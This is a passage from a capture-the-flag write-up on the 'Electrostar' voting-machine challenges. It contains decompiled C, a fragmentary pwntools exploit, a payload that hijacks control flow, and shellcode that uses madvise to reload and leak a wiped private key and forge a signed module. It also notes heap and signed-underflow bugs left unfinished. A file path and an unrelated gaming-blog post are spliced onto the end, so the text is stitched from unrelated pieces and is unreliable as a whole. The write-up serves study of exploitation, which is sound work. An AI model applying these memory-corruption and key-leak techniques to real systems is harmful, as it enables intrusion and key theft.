2 ) // [ C ] if ( !needs_to_vote ) goto LABEL_13; // do the submit needs_to_vote = 0; menu_driver((int)menu_obj, 524); // REQ_TOGGLE_ITEM v4 = 0LL; v5 = 0LL; v6 = 0LL; v7 = 0LL; v18 = 0; v17 = 2; for ( i = 0; i <= 1; ++i ) LODWORD(v10) = item_value(menu_items[i]); v18 += v10; v2 = v17++; *((_BYTE *)&v4 + v2) = i; LOBYTE(v4) = v18; v11 = 15; SHIDWORD(v10) /= v18; BYTE1(v4) = BYTE4(v10); submit_vote_req(10, (__int64)&v4, 32); return unpost_menu((int)menu_obj); While this seems like a lot, I’ve highlighted a few interesting portions. At [ A ] the system creates an ncurses menu and populates it with the options. At [ B ], it has entered a loop to receive keyboard inputs to navigate the menu - 258 and 259 are terminal control codes which correspond to the DOWN and UP arrow keys. Hitting enter goes into a brief check where at [ C ] it checks if you have selected the “Submit” option. If you have not, it will mark needs_to_vote as 0 and toggle the selected value on that menu option. If you have, it will check if you have ever selected something and if so, generate an IPC message to send. The bug here is that you can toggle menu options, so toggling an option on and off results in an item_value of 0, but with a zero needs_to_vote flag. This causes a SIGFPE when calculating SHIDWORD(v10) /= v18, which in turn causes the gui_module to crash. Luckily for us, the fallback in this application is an interface that lets us send raw IPC messages into the ballot_module pipe. This is made obvious by the program itself, which prints out the string WARN: No GUI process, falling back to STDIN and switches its call for data to fgets(s, input_read_len, stdin) - how convenient! __int64 __fastcall process_ipc_data(char *data) void *v1; // rsp signed __int64 v2; // rax __int64 idx; // rax __int64 v4; // [rsp+0h] [rbp-50h] int v6[2]; // [rsp+18h] [rbp-38h] char *v7; // [rsp+20h] [rbp-30h] __int64 v8; // [rsp+28h] [rbp-28h] unsigned __int8 v9; // [rsp+36h] [rbp-1Ah] unsigned __int8 highest_val; // [rsp+37h] [rbp-19h] unsigned __int64 i; // [rsp+38h] [rbp-18h] v9 = *data; v8 = (char)v9 - 1LL; v1 = alloca(16 * (((char)v9 + 15LL) / 0x10uLL)); // [ A ] v7 = (char *)&v4; if ( v9 > 0x63u ) v2 = 100LL; v2 = (unsigned int)(char)v9; *(_QWORD *)v6 = v2; memcpy(v7, data + 1, v2); // [ B ] highest_val = 0; for ( i = 0LL; i < *(_QWORD *)v6; ++i ) if ( v7[i] > (unsigned int)highest_val ) highest_val = v7[i]; LOBYTE(idx) = dword_2040++; idx = (unsigned __int8)idx; byte_2060[(unsigned __int8)idx] = highest_val; return idx; Inside ballot_module’s process_ipc_data function, it performs a stack alloca() call based on the first byte of input at [ A ], which it treats as a signed value. Since it’s signed, this is another bug; we can blow out the expectation of where the stack data will be allocated by passing a value greater than 0x7f. Afterwards, our raw payload will be copied to the stack at [ B ], giving us control of pc (modules have no stack canaries). Obtaining the flag is straightforward from here, since the module provides a print_part1_flag function we can jump to, but which is never otherwise called. from pwn import * from pwnlib.util.proc import pid_by_name context.binary = "./machine" #context.log_level = "CRITICAL" context.log_level = "DEBUG" p = process("./connect.sh", stdin=PTY, stdout=PTY, raw=True) pemptr = int(p.recvline().strip(), 16) p.recvuntil("Starting GUI module") #gdb.attach(sorted(pid_by_name("machine_patched"))[3], gdbscript=""" #b *getch print("here we go") # these are encodings for terminal contrl codes p.send_raw("\33OB") # DOWN p.send_raw("\33OB") # DOWN # gui_module crashed, we can we can now send raw ipc # get pc inside balloT_module payload = "\xff" + cyclic(24) + "\x00"*8 payload += p64(0x500000) payload += p64(0x500741)*8 # one of these will be pc ;) payload = payload.ljust(100, "A") p.recvuntil("Here is your flag") flag: flag{in rwx no one can hear you scream} Part 2 After some finagling in part 1, we obtain execution in the context of ballot_module. And, even though I actually ropped in the first part, we can get full shellcode execution without any extra work in this stage simply by casting each byte of shellcode as a vote. In process_ipc_data above, it will store whatever byte you pass it in your message into a global array and then increment the dest ptr. We do have to send each part 1 byte at a time though, so I wrote a quick stager shellcode to make an IPC request for a larger chunk of bytes to then jump to. Progress! From here, we can examine the code required to make an IPC call to retrieve the second flag: if ( opcode == 1337 ) /* first flag */ stream = fopen("flag1.txt", "r"); fgets(&s, 64, stream); printf("\x1B[92m[Module %u] Here is your flag #1: %s\n\x1B[0m", a1->pid, &s); else if ( opcode == 31337 ) /* second flag */ if ( a1->flags & 1 ) v4 = fopen("flag2.txt", "r"); fgets(&s, 64, v4); printf("\x1B[92m[Module %u] Here is your flag #2: %s\n\x1B[0m", a1->pid, &s); printf("\x1B[93mWARN: Module %u does not have permission for command 31337\n\x1B[0m", a1->pid); Reading the second flag requires our module to have a1->flags & 1, which we do not have. Also, the hint for this challenge states: Hint: For flag2 you may want to recover the private key.... So, we probably want to recover the private key from the binary and generate our own signed module with that flag set. So - when modules are loaded, they’re just forked off of the machine process which contains the private key (at least, the version on the server does). So how does the binary prevent us from just reading it out of our own process? __int64 init_ec() __int64 result; // rax private_pem_p = mmap(0LL, 0x1000uLL, 3, 34, 0, 0LL); if ( !private_pem_p ) puts("\x1B[91mCould not map for key\x1B[0m"); if ( madvise(private_pem_p, 0x1000uLL, 18) ) // MADV_WIPEONFORK printf("%p\n", private_pem_p); memcpy(private_pem_p, private_pem, (unsigned int)private_pem_len); memset(private_pem, 0, (unsigned int)private_pem_len); curve = EC_GROUP_new_by_curve_name(713LL, 0LL); result = curve; if ( !curve ) puts("\x1B[91mERROR: Failied to load curve:\x1B[0m"); return result; init_ec is invoked very early in the lifecycle of the program and is responsible for creating a random mapping, marking it as MADV_WIPEONFORK, and printing out that memory address. Note that MADV_WIPEONFORK causes the page to be wiped to all nulls when we fork. Afterwards, the private key is copied from the program’s data into that mapping and memset to 0 in the data section. In other words, we don’t have it in our own process data section, nor do we have it in the mapping (because of MADV_WIPEONFORK). There is some further “memory cleaning code” that is worth examining. unsigned __int64 __fastcall clean(struct module_t *a1) unsigned int v1; // eax __int64 v3; // [rsp+0h] [rbp-70h] struct module_t *v4; // [rsp+8h] [rbp-68h] void *ptr; // [rsp+18h] [rbp-58h] size_t n; // [rsp+20h] [rbp-50h] void *v7; // [rsp+28h] [rbp-48h] struct module_t *v8; // [rsp+30h] [rbp-40h] FILE *stream; // [rsp+38h] [rbp-38h] char s1[8]; // [rsp+40h] [rbp-30h] __int64 v11; // [rsp+48h] [rbp-28h] __int64 v12; // [rsp+50h] [rbp-20h] __int64 v13; // [rsp+58h] [rbp-18h] unsigned __int64 v14; // [rsp+68h] [rbp-8h] v4 = a1; v14 = __readfsqword(0x28u); if ( !has_gui ) v1 = getpid(); printf("[Module %u] Scrubbing process for security\n", v1); v8 = ipc_head; if ( ipc_head ) v8 = (struct module_t *)v8->prev_ptr; while ( v8 ) if ( v8 != v4 ) close(v8->pipes1); // [ A ] v8 = (struct module_t *)v8->prev_ptr; ptr = 0LL; n = 0LL; *(_QWORD *)s1 = 0LL; v11 = 0LL; v12 = 0LL; v13 = 0LL; if ( getline((char **)&ptr, &n, stream) == -1 ) __isoc99_sscanf(ptr, "%lx-%*x %*4c %*x %*x:%*x %*u %7s", &v7, s1);// find the stack ptr = 0LL; while ( strcmp(s1, "[stack]") ); // [ B ] enable_sandbox(); // [ C ] memset(v7, 0, (char *)&v3 - (_BYTE *)v7); // wipe everything below us on the stack return __readfsqword(0x28u) ^ v14; This function runs post-fork but before the module obtains execution. At [ A ], we close any pipes which correspond to communication channels with other modules. At [ B ], the machine scans for its own stack mapping in memory by reading /proc/self/maps. After ending the function, it will memset everything on the stack below this functions execution to 0, ostensibly to prevent leaking data onto the stack from spilled registers. Finally, in [ C ] it loads the following seccomp profile (for which source was provided): void enable_sandbox() { // Init the filter scmp_filter_ctx ctx; ctx = seccomp_init(SCMP_ACT_KILL); // default action: kill seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(close), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(poll), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(lseek), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(mmap), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(mprotect), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(munmap), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(rt_sigaction), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(rt_sigprocmask), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(rt_sigreturn), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(readv), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(writev), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(pipe), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(select), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(mremap), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(madvise), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(nanosleep), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(alarm), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(getpid), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(sendfile), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(gettimeofday), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(getuid), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(getgid), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(geteuid), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(getegid), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(futex), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(set_thread_area), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(get_thread_area), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(ioctl), 1, SCMP_A0(SCMP_CMP_EQ, 1)); seccomp_rule_add(ctx, SCMP_ACT_ERRNO(ENOENT), SCMP_SYS(stat), 0); This is a lot of functions! Unfortunately, we can’t open(2) or similar functions, so we can’t directly read the flag or the private key. However, we still have a lot of random functions, some of which seem out of place. Ultimately, I spent a lot of time trying out different ideas. I noticed a few file descriptor leaks from the machine to our module - it never closes /proc/self/maps, for example. We can also cause it to open arbitrary files by requesting the IPC service load that path as a module. If the first byte of the file we open is <0x40, it will actually dump the corresponding number bytes to stdout as a hex-encoded signature. Unfortunately, I couldn’t figure out a way to leverage either of these patterns to leak the flag. Eventually I turnd my attention to the allowed syscalls in the seccomp profile and had a realization - what happens if you call madvise(addr, 0x1000, MADV_DONTNEED) on a file-backed memory region that you have written to? Remember, the program overwrite the private key inside its own file-backed data section with null bytes. Intuitively I expected one of the following behaviors to happen: 1. The system destroys the mapping and next time you access it, you get null data 2. The system forks the vma and disassociates it from the file, possibly spilling it to a pagefile until you cause a page fault However, what actually happens is that the system reloads that page of the file from disk, as it was on disk! So all we have to do is to invoke madvise(data_page_with_private_key, 0x1000, MADV_DONTNEED) and we can read out the private key from our own memory. Very cool trick :) ; our thrower patches this value with the `private_pem_p` we are given, ; and we will use this as a helpful scratch buffer mov r12, 0x0807060504030201 ; leak base mov rax, [0x502120] mov rax, [rax+0x28] sub rax, 0x206280 ; move forward to the database add rax, 0x206000 mov r14, rax add r14, 0x20 ; madvise the mapping mov rdi, rax mov rsi, 0x1000 mov rdx, 4 call madvise ; grab its length mov rdi, r14 call strlen mov r13, rax ; copy it into our temp buffer mov rdi, r12 mov rsi, r14 mov rdx, r13 call memcpy ; send the ipc message to print out the value mov rdi, 1 mov rsi, r12 mov rdx, r13 call ipc jmp perma mov rax, 0x500406 jmp rax mov rax, 0x5002E8 jmp rax mov rax, 0x5002D0 jmp rax mov rax, 0x1c Once we’ve leaked the key, we can patch it into our own local binary where it should go. The local binary provides a convenient command line option to sign payloads as desired. All that is left is to transmit our payload to the server. socat is unhappy with certain bytes (e.g. 0x03) which the challenge authors use as an EOF byte. The IPC mechanism itself for reading in data breaks on newlines. Therefore, I actually used a stager payload to receive my module file and un-encode those special bytes from it. ; this value is patched to the number of encoded bytes mov rdi, 0x5555555555555555 call read_bytes mov r14, rax ; process it and copy it to the right buffer ; this value is patched to the number of decoded bytes mov rdi, 0x5656565656565656 call malloc mov r15, rax mov r8, 0x5555555555555555 mov r9, 0x5656565656565656 ; output counter mov rdx, 0 ; input counter mov rbx, 0 cmp rbx, r8 je loopdone mov eax, [r14+rbx] cmp eax, 0x41414143 je three cmp eax, 0x41414144 je newline jmp normal mov rax, 0x0b sub rax, 1 mov [r15+rdx], al add rbx, 4 jmp loopbottom mov rax, 0x04 sub rax, 1 mov [r15+rdx], al add rbx, 4 jmp loopbottom mov [r15+rdx], al add rbx, 1 jmp loopbottom ; always increment the output counter add rdx, 1 jmp loopstart mov rdi, 21 mov rsi, r15 mov rdx, 0x5656565656565656 call ipc After this jerry-rigging, we obtain the flag for part 2! flag: flag{https://www.youtube.com/watch?v=bg6-LVCHmGM&t=3929} Part 3 I didn’t actually solve part 3, but I found 3 interesting bugs which I assume are at least partially related to pwning the process. It should be noted that we don’t need any leaks, since we have execution in a forked copy of the process and so can figure everything out ourselves (plus, it hands us a pointer to dlsym as an argument when it jumps to our code) • The IPC handler for opcode 50 contains an obvious signed underflow bug. Not only is this method clearly intended to be abused, it’s also convenient. The primitive allows us to write a fully controlled qword at any negative offset below the record_array, which is located in bss. Interesting targets there include stdin/stdout/stderr FILE * pointers, which we can leverage for FSOP on this version of libc. if ( opcode == 50 ) if ( !(a1->flags & 4) ) printf("\x1B[93mWARN: Only the init module can call command 50\n\x1B[0m", databuf); return __readfsqword(0x28u) ^ v12; if ( datalength <= 0xF ) return __readfsqword(0x28u) ^ v12; v9 = *((_DWORD *)databuf + 1); // controlled index if ( v9 > 31 ) // signed comparison printf("\x1B[93mWARN: Command 50 out of bounds!\n\x1B[0m", databuf); return __readfsqword(0x28u) ^ v12; record_array[v9] = *((_QWORD *)databuf + 1); // controlled qword written • In opcode 2’s handler, there are some lifetime issues around the module header chunk else if ( opcode == 2 ) if ( waiting_for_input ) write(a1->pipe2write, 0LL, 2uLL); else if ( datalength > 5 ) waiting_for_input = a1; // save a pointer to our module chunk in a global input_read_len = *((unsigned __int16 *)databuf + 2); check_gui_output(0LL, 0LL); void __fastcall check_gui_output(void *a1, size_t a2) size_t datalen; // [rsp+0h] [rbp-20h] void *databuf; // [rsp+8h] [rbp-18h] char *s; // [rsp+18h] [rbp-8h] databuf = a1; datalen = a2; if ( a1 || !waiting_for_input || has_gui ) if ( databuf ) // this is 0 in the above call, so we fall through here if ( waiting_for_input ) if ( datalen > input_read_len ) datalen = input_read_len; write(waiting_for_input->pipe2write, &datalen, 2uLL); write(waiting_for_input->pipe2write, databuf, datalen); waiting_for_input = 0LL; puts("\x1B[93mWARN: GUI process has no pipe connected, data lost\x1B[0m"); puts("\x1B[93mWARN: No GUI process, falling back to STDIN\x1B[0m"); s = (char *)calloc(input_read_len, 1uLL); fgets(s, input_read_len, stdin); write(waiting_for_input->pipe2write, &input_read_len, 2uLL); write(waiting_for_input->pipe2write, s, input_read_len); waiting_for_input = 0LL; waiting_for_input is never unset, and will be freed if the module exits. This means we can, at the very least, probably control which file descrpitor arbitrary data is written to as part of waiting_for_input->pipe2write • Inside the module loading code, there is a free(3) of possibly uninitialized stack data. This occurs when a module is loaded that fails one of the checks prior to signature validation. The chunk that is freed is supposed to be the calculated module hash. The easiest way to trigger this is to try to load a file whose first byte is >0x40. Most of the time, you will segfault by freeing garbage. However, by a special series of opcodes (opcode 10, followed by the bug trigger) I could get a free of an already-freed 0x20 heap chunk. Unfortunately, I wasn’t able to turn this around fast enough before the competition ended. The game plan was to spray chunks prior to the trigger to ensure our double freed chunk would be in the tcache, allowing for arbitrary chunk allocation easily. However, the act of spraying was causing sufficient churn on my stack as to break the primitive and I ran out of time. Parting Thoughts Electrostar was an awesome series of challenges. Learning about madvise is cool, and so are creative pwns. Shoutout to itszn for a great challenge, and all of RPISEC for hosting a very cool event. See you all in 4 years :)?
global_05_local_5_shard_00002591_processed.jsonl/40434
So, what are your weekend Gaming plans? What Games will you be diving into as you leave the drudgery of the working week behind? Will you be returning to something you’ve already started, or are you firing up something entirely new as you embrace your two work-free days? Are you using your downtime to finally write up that post that’s been bouncing around in your head for a while? Are you catching up with all of the Gaming goodness that’s been filling up your WordPress Reader over the past few days? Whatever your plans, feel free to let us know. If there’s anything you want to talk about – maybe something in the Gaming World that got your attention – that’s *totes* OK too, go right ahead. Perhaps you’re looking for a suggestion as to what to play next, or you’re struggling to decide which game on your ‘To Play’ pile should get priority!? Perhaps you’re even struggling with a particularly hard part of a game, and would like to go old-school and ask for some help, rather than, like, using Google an’ shit! [I was tempted to do a ‘Dear Gamesmaster’ joke there, but it might be a bit niche and/or make me look really old!]. Anyways, if the answer to any of the above is yes, or there’s anything else you’d like to talk/ask/rant about, feel free to do so. The WGD’s here for you, and you’re more than welcome to join in. Seriously, make yourself at home, and have a great weekend everybody!